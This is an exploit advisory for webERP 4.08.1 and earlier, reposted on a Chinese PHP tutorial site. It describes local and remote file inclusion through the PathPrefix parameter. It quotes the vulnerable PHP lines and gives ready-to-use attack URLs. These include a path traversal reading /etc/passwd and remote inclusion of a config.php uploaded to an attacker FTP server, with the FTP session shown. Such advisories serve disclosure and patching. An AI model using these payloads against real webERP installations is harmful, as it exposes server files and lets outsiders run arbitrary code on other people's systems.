来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] # [ webERP = 4.08.1 ] Local/Remote File Inclusion Vulnerability #影响程序: Accounting Best Practice Business Administration System官网: http://www.weberp.org/下载地址: http......
# [ webERP <= 4.08.1 ] Local/Remote File Inclusion Vulnerability #
影响程序: "Accounting & Best Practice Business Administration System" 官网: http://www.weberp.org/ 下载地址: http://sourceforge.net/projects/web-erp/files/ 缺陷所出文件: ./webERP/index.php (line: 4) # 1 <?php # 2 $PageSecurity=0; # 3 # 4 include('includes/session.inc'); // 1 # ..cut.. # # File: ./webERP/includes/session.inc (lines: 4-16) # ..cut.. # 4 if (!isset($PathPrefix)) { // 2 # 5 $PathPrefix=''; # 6 } # 7 # 8 # 9 if (!file_exists($PathPrefix . 'config.php')){ // 3 # 10 $rootpath = dirname(htmlspecialchars($_SERVER['PHP_SELF'],ENT_QUOTES,'UTF-8')); # 11 if ($rootpath == '/' OR $rootpath == "\\") { # 12 $rootpath = ''; # 13 } # 14 header('Location:' . $rootpath . '/install/index.php'); # 15 } # 16 include($PathPrefix . 'config.php'); // 4 [LFI]/[RFI] # www.2cto.com # # [LFI] ( magic_quotes_gpc = Off; ) # Vuln: http://www.2cto.com /webERP/index.php?PathPrefix=../../../../../../etc/passwd%00 # # [RFI #1] ( allow_url_fopen = On; allow_url_include = On; register_globals = On; ) # It is possible to bypass line: (!file_exists($PathPrefix . 'config.php')), # when we use some url wrappers. For example ftp:// 示例: # # dun@rd01 ~ $ cat ./config.php # <?php phpinfo(); ?> # dun@rd01 ~ $ ftp ftp.server.com # Connected to ftp.server.com. # Name (ftp.server.com): user # 331 User user OK. Password required # Password: # 230 OK. Current restricted directory is / # ftp> put config.php # local: config.php remote: config.php # 200 PORT command successful # 226 File successfully transferred # ftp> quit # 221 Logout. # # Now we can use url: # Vuln: http://www.2cto.com /webERP/index.php?PathPrefix=ftp://user:password@ftp.server.com/ # In this case, script checks if the file 'ftp://user:password@ftp.server.com/' . 'config.php' does not exist. # If exist, then include it. # [RFI #2] ( allow_url_include = On; register_globals = On; ) # # File: ./webERP/includes/LanguageSetup.php (lines: 29-84) # ..cut.. # 29 if (!function_exists('gettext')) { # ..cut.. # 34 require_once($PathPrefix . 'includes/php-gettext/streams.php'); # ..cut.. # 64 } else { # 65 include($PathPrefix . 'includes/LanguagesArray.php'); # ..cut.. # 84 } # ..cut.. # 缺陷: http://localhost/webERP/includes/LanguageSetup.php?PathPrefix=http://localhost/phpinfo.txt? |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com